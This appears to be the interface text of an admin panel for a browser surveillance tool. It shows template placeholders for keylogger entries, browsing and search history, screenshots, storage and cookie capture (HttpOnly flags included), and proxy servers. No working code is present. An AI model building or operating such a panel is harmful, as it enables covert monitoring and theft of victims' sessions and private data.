{{ notif.type === 'success' ? '✓' : (notif.type === 'error' ? '✗' : 'i') }}
{{ notif.message }}
Welcome, {{ username }}

Users

Users list
ID Username Role Allowed Proxies Actions
{{ u.userId }} {{ u.userName }} {{ u.role }} Yes No
{{ p.serverName || 'No name' }}
No proxies
No users found.
User editor
Assigned proxies
No proxies assigned.
{{ getProxyName(id) }}

Key Logger Dashboard

Keystroke Logs
ID Username URL Captured Text Captured At
{{ log.id }} {{ log.userName || '-' }} {{ log.url || '-' }} {{ log.text || '-' }} {{ formatTime( log.capturedAt) }}
No keylogger entries found.

Key Logger Dashboard

Keystroke Logs
ID Username URL Title Visit Count Visit Time
{{ log.id }} {{ log.userName || '-' }} {{ log.url || '-' }} {{ log.title || '-' }} {{ log.visitCount || '-' }} {{ formatTime( log.lastVisitTime) }}
No keylogger entries found.

Key Logger Dashboard

Keystroke Logs
ID Username URL Query Engine Captured At
{{ s.id }} {{ s.userName || '-' }} {{ s.url || '-' }} {{ s.engine || '-' }} {{ s.query || '-' }} {{ formatTime( s.timestamp) }}
No Search entries found.

Screenshots

Screenshots list
ID Username Url ImgSize TimeStamp Action
{{ p.id }} {{ p.userName }} {{ p.url }} {{ p.imgSize }} {{ formatTime(p.time) }}
No Screen found.

Storage Management

Storage List
Id UserName Type Domain ChangeType Time Action
{{ s.id }} {{ s.userName }} {{ s.type }} {{ s.domain }} {{ formatTime(s.time)}} {{ s.changeType }}
Nothing To Show

Cookie Management

Cookie List
Id User Name Domain Change Type HttpOnly Expires Time Action
{{ c.id }} {{ c.userName }} {{ c.domain }} {{ c.changeType }} {{ c.httpOnly ? 'Yes' : 'No' }} {{ formatExpiry(c.exp) }} {{ formatTime(c.timestamp) }}
No Cookies Found

Proxies

Proxies list
ID Server IP Port Schema Status Auth Actions
{{ p.id }} {{ p.serverName }} {{ p.ip }} {{ p.port }} {{ p.schema }} Active Inactive Auth None
No proxies found.
Proxy editor
{{ loading.text }}